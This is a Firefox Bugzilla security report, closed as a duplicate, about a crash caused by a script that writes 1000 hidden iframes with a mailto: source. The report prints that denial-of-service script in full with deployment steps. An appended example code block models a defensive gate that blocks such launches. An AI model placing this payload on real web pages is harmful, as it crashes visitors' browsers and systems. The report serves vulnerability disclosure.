Closed Bug 607344 Opened 15 years ago Closed 15 years ago

The browser and the windows crashed when you open the website.

Categories

(Firefox :: Security, defect)

x86
Windows 7
defect
Not set
critical

RESOLVED DUPLICATE of bug 566893

People

(Reporter: bence, Assigned: bsterne)

Details

(Whiteboard: [sg:dupe 566893])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.11) Gecko/20101012 Firefox/3.1.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.11) Gecko/20101012 Firefox/3.1.2

Just analyse the next script:

    <script type="text/javascript">
    var i=0
    for (i=0;i<=999;i++)
    {
    document.write("<iframe width=0px height=0px frameborder=0 border=0 src='mailto:bence@webbiztonsag.com?body=I love you budy. Thanks for virus too. Will format my pc, and pay a much money. Bye.'></iframe>");
    }
    </script>

Reproducible: Always

Steps to Reproduce:
1. Go to Notepad -> Create a new file.
2. Copy this to the file:

    <script type="text/javascript">
    var i=0
    for (i=0;i<=999;i++)
    {
    document.write("<iframe width=0px height=0px frameborder=0 border=0 src='mailto:bence@webbiztonsag.com?body=I love you budy. Thanks for virus too. Will format my pc, and pay a much money. Bye.'></iframe>");
    }
    </script>

3. Save as php.
4. Upload to a webserver and see it from the browser.
5. Your Mozilla will crash and Outlook will start 1000 times.
6. Your Windows crashes, so you should restart your computer.

Actual Results:
You can see that Mozilla Firefox doesn't limit the mailto: variable.

Expected Results:
Repair this bug. And check the skype:, msn: and other variables.

I tested it on Windows Vista/XP/7 with the latest version of Mozilla Firefox.
Component: General → Security
We need to not do anything for <iframe src=mailto:...>. Brandon, want to take this one?
Assignee: nobody → bsterne
Status: UNCONFIRMED → NEW
Ever confirmed: true
We have existing bugs on that, no?
I searched but I haven't found this vulnerability in Bugzilla, but maybe I overlooked it. If the reproduction doesn't work, just view the source: view-source:http://sys0p.net/admin/ I use unescape on the website.

Thanks, B
(In reply to comment #2)
> We have existing bugs on that, no?

Yes, bug 566893. In fact this bug is probably a DUP of that bug, unless the mailto: src for the iframe isn't necessary to cause the crash.
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 566893]
Group: core-security
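
Added example, not part of the bug thread and not Firefox code: a small model of the behaviour asked for above, where a subframe load of an external-protocol URL such as <iframe src=mailto:...> is ignored and script-driven top-level launches are limited per page. The class name, the request fields and the per-page budget are assumptions made for illustration.

```javascript
// Added illustration: a model of an external-protocol launch gate.
// ExternalLaunchGate and the request fields are hypothetical, not Firefox internals.
const WEB_SCHEMES = new Set(["http:", "https:", "about:", "data:", "blob:"]); // assumed in-browser schemes

function schemeOf(url) {
  // A URL scheme is ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ":".
  const m = /^\s*([a-z][a-z0-9+.-]*:)/i.exec(url);
  return m ? m[1].toLowerCase() : null; // null: relative URL, stays in the browser
}

class ExternalLaunchGate {
  constructor(maxPerPage = 1) {
    this.maxPerPage = maxPerPage; // assumed budget of script-driven launches per page load
    this.launched = 0;
  }

  // request: { url, isTopLevel, userInitiated }
  decide(request) {
    const scheme = schemeOf(request.url);
    if (scheme === null || WEB_SCHEMES.has(scheme)) return "load-in-browser";
    // Subframe loads never reach the OS handler (the <iframe src=mailto:...> case).
    if (!request.isTopLevel) return "ignore";
    // Script-driven top-level navigations share a small per-page budget.
    if (!request.userInitiated && this.launched >= this.maxPerPage) return "ignore";
    this.launched += 1;
    return "launch-handler";
  }
}

// Constructed input modelled on the report: 1000 hidden iframes with a mailto: src.
function simulateReport(gate) {
  const counts = { "launch-handler": 0, "ignore": 0, "load-in-browser": 0 };
  for (let i = 0; i <= 999; i++) {
    const verdict = gate.decide({
      url: "mailto:user@example.invalid?body=constructed",
      isTopLevel: false,
      userInitiated: false,
    });
    counts[verdict] += 1;
  }
  return counts;
}

console.log(simulateReport(new ExternalLaunchGate()));
```

With the gate in place the 1000 iframe loads from the report produce no handler launches, while a link the user clicks at top level still opens the mail client.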